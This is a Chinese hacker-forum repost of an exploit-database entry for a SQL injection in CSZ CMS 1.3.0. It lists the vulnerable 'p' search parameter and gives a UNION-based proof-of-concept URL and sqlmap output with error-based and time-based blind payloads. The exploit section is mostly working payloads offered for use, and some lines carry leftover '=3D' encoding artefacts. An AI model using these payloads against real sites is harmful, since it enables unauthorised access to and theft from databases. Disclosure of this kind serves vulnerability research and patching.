CSZ CMS 1.3.0 - 'Multiple' Blind SQLi - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月3日2年前

# Exploit Title: CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
# Date: 2021-04-22
# Exploit Author: Dogukan Dincer
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Version: 1.3.0
# Tested on: Kali Linux, Windows 10, PHP 7.2.4, Apache 2.4

# Discovery of Vulnerability

- First go to CSZ CMS web page
- then go to http://yourhost/plugin/article directory on CMS.
- To see the error-based SQLi vulnerability, the ' character is entered in the search section.
- It is determined that the "p" parameter creates the vulnerability.
- Databases can be accessed with manual or automated tools.

# Proof of Concept

http://127.0.0.1/csz-cms/plugin/article/search?p=3D1'") UNION ALL SELECT CONCAT(0x717a7a6b71,0x5449414d6c63596c746759764a614d64727476796366686f4e6a7a474c4a414d6b616a4269684956,0x716a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

# Sqlmap output:

Parameter: p (GET)
    Type: error-based
    Title: MySQL >=3D 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: p=3D1'") AND EXTRACTVALUE(8555,CONCAT(0x5c,0x717a7a6b71,(SELECT (ELT(8555=3D8555,1))),0x716a717a71))-- OUUO

    Type: time-based blind
    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=3D1'") AND (SELECT 3910 FROM (SELECT(SLEEP(5)))qIap)-- ogLS

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

CSZ CMS 1.3.0 - 'Multiple' Blind SQLi

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索